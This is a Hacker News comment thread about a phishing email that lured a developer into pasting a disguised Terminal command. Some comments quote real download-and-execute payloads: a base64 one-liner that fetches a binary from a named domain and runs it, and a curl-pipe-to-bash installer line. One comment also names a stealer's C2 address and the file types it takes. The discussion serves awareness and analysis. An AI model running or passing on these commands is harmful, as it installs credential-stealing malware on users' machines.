60 comments

[ 3.4 ms ] story [ 75.5 ms ] thread
> as ChatGPT confirmed when I asked it to analyze it

lol we are so cooked

The entire closing paragraph that suggested “AI did this” was weird.
Better yet - ChatGPT didn't actually decode the blob accurately.

It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).

It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.

In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).

I just pasted the blob in my terminal without the pipe to bash, felt smart, then realized if they had snuck `aaa;some-bad-cmd;balblabla` in there I'd have cooked myself.

Not so smart, after all.

Maybe so, but please don't post unsubstantive comments to Hacker News.
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!".

Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?

Our call center had to develop a procedure and do training around explaining to grandmas why we will not let them purchase those iTunes giftcards, and that their relative is not actually in prison anywhere, and that no prison accepts iTunes gift cards for bail.

There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.

Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32

The reality is that your CEO will fall for it.

I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.

> Phishing emails disguised as support inquiries are getting more sophisticated, too. They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.

The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.

"I don't have to prove anything. Fuck off." is my normal response to being presented with CAPTCHAs or other "challenges" unexpectedly.
My standard procedure for copying and pasting commands from a website, is to first run it through `hd` to make sure there's no fuckery with Unicode or escape sequences:

    xclip -selection -clipboard -o | hd
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was as the author found out (xpaste is my paste to stdout alias):

    > xpaste | hd
    00000000  65 63 68 6f 20 2d 6e 20  59 33 56 79 62 43 41 74  |echo -n Y3VybCAt|
    00000010  63 30 77 67 4c 57 38 67  4c 33 52 74 63 43 39 77  |c0wgLW8gL3RtcC9w|
    00000020  61 6b 74 74 54 56 56 47  52 56 6c 32 4f 45 46 73  |akttTVVGRVl2OEFs|
    00000030  5a 6b 74 53 49 47 68 30  64 48 42 7a 4f 69 38 76  |ZktSIGh0dHBzOi8v|
    00000040  64 33 64 33 4c 6d 46 74  59 57 35 68 5a 32 56 75  |d3d3LmFtYW5hZ2Vu|
    00000050  59 32 6c 6c 63 79 35 6a  62 32 30 76 59 58 4e 7a  |Y2llcy5jb20vYXNz|
    00000060  5a 58 52 7a 4c 32 70 7a  4c 32 64 79 5a 57 4e 68  |ZXRzL2pzL2dyZWNh|
    00000070  63 48 52 6a 61 47 45 37  49 47 4e 6f 62 57 39 6b  |cHRjaGE7IGNobW9k|
    00000080  49 43 74 34 49 43 39 30  62 58 41 76 63 47 70 4c  |ICt4IC90bXAvcGpL|
    00000090  62 55 31 56 52 6b 56 5a  64 6a 68 42 62 47 5a 4c  |bU1VRkVZdjhBbGZL|
    000000a0  55 6a 73 67 4c 33 52 74  63 43 39 77 61 6b 74 74  |UjsgL3RtcC9waktt|
    000000b0  54 56 56 47 52 56 6c 32  4f 45 46 73 5a 6b 74 53  |TVVGRVl2OEFsZktS|
    000000c0  20 7c 20 62 61 73 65 36  34 20 2d 64              | | base64 -d|
    000000cc
    > echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d
    curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
> as ChatGPT confirmed when I asked it to analyze it:

When I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.

As artificial intelligence has evolved, so have hacking techniques. Attacks using techniques like deepfake and phishing have become increasingly prevalent.Multi-layered attacks began to be created.While they impersonate companies in the first layer, they bypass security systems (2FA etc.) in the second layer.

Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.

I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
Correlated data: sites.google.com has been blocked via machine policy at multiple workplaces I've come into contact with.
It’s interesting how these big tech companies are playing a role in all these scams. I do a fair amount of paid ads on Facebook, and I get probably about 20 phishing messages a day via Facebook channels; trying to get me to install fake Facebook ads management apps (iOS TestFlight), or leading me to Facebook.com urls that are phishing pages via facebooks custom page designer. These messages come through Facebook, use facebooks own infrastructure to host their payloads, and use language which Facebook would know should only come from their own official channels. How is this not super easy for Facebook to block?? I can only explain it as sheer laziness/lack of care.
As long as sites.google.com is not blocked by Chrome (which will never happen) or until Google stops making money on them (which won't happen either because spammers are paying for it), Google will continue to run the service.
When you share a link through the Google app it now gets "helpfully" shortened to a "share.google" domain. This is even worse.
> ChatGPT confirmed

Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.

I found that amusing too; especially upon reaching the end where it talks about using AI for spam and phishing.
I got one of these too, ostensibly from Cloudflare: https://imgur.com/a/FZM22Lg

This is what it put in my clipboard for me to paste:

  /bin/bash -c "$(curl -fsSL https://cogideotekblablivefox.monster/installer.sh)"
Which is why it's infuriating that health care companies implement secure email by asking the customer to click on a 3rd party link in an email.

An email they're saying is an insecure delivery system.

But we're supposed to click on links in these special emails.

Fuck!

(comment deleted)
To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer.

I thought perhaps this was going that way up until around the echo | bash bit.

I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.

Not helped by the civilizational-infrastructure absence of a role containing someone smart that you can take a bizarre situation to, and expect to get something more than a brush-off.
Several 911 calls of people sounding to be ordering a pizza but calling for help, where they attacker can also hear the caller. Example: https://youtu.be/UiWTmUNDFRg
Wait...

> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it

You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.

The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer.

It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.

It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.

nowadays, restricting outgoing connections initiated by unknown binaries should be a must. Specially if it's launched from /tmp

Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.

In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself.

I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?

(comment deleted)
> It looked like a Google Drive link

No it didn't. It starts with "sites.google.com"

> My app’s website doesn’t even show a cookie consent dialog, I don’t track or serve ads, so there’s no need for that.

I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.

the website hosting the malware is.. an indian hose supplier? https://www.amanagencies.com/

Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...

It’s common in phishing schemes to either have a non-functional site hosting only the payload or one that hosts a full front appearing like a normal website, usually a blog with news.
Probably experts in rubber-hose cryptanalysis.
There's nothing here to indicate AI powered spam. It's totally routine kind of phishing
Remember, the mac OSX "brew" webpage has a nice helpful "copy to clipboard" of the modern equivalent of "run this SHAR file" -we've being trained to respect the HTTPS:// label, and then copy-paste-run.
This is tame and not scary compared to the kinds of real live human social engineering scams I’ve seen especially targeting senior leaders. With those scams there’s a budget for real human scammers.

This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?

Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.

> as ChatGPT confirmed when I asked it to analyze it

Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?

Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.